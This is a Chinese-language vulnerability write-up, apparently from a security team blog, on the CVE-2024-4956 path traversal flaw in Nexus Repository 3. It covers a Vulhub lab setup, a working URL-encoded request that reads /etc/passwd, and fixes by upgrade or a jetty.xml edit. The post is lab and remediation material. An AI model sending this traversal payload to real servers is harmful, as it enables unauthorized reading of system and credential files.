CVE-2024-4956 Nexus Repository 3 路径遍历漏洞

CVE-2024-4956 Nexus Repository 3 路径遍历漏洞

海狼风暴团队 2025-06-05 09:43

漏洞简述

Nexus Repository 3 在处理用户提供的路径时存在缺陷,仅依赖 Jetty 的基础验证,未进行严格的安全检查。攻击者可构造恶意 URL 进行路径遍历,访问系统上的任意文件。

受影响版本

Nexus Repository 3.0.0 – 3.68.0

图片

漏洞环境搭建

图片

知识扩展

Nexus Repository 3是一个仓库管理工具,用于管理和托管软件构件。它支持集中存储、管理和分发构件,便于团队协作和自动化构建。

漏洞环境搭建

漏洞环境搭建

漏洞环境搭建

漏洞环境搭建

漏洞环境搭建

漏洞环境搭建

漏洞环境搭建

1.克隆 VulHub 仓库到本地

git clone https://bgithub.xyz/vulhub/vulhub.git

image.png

  1. 进入到漏洞环境目录
cd vulhub/nexus/CVE-2024-4956
docker-compose up -d

3.靶场搭建成功

漏洞验证

1.访问8081端口

2.burp抓包,修改内容如下:

GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1

可见,/etc/passwd已被成功读取

image.png

修复建议

  1. 将 
    Sonatype Nexus Repository 升级到3.68.1或更高版本

  2. 通过修改jetty.xml文件,禁用对/public路径的访问

修复步骤:

找到 
jetty.xml 文件

删除以下行:

<Setname="resourceBase"><Property name="karaf.base"/>/public</Set>

保存文件并重启环境,可以看到防御有效:

image.png

– 扫码立即关注 –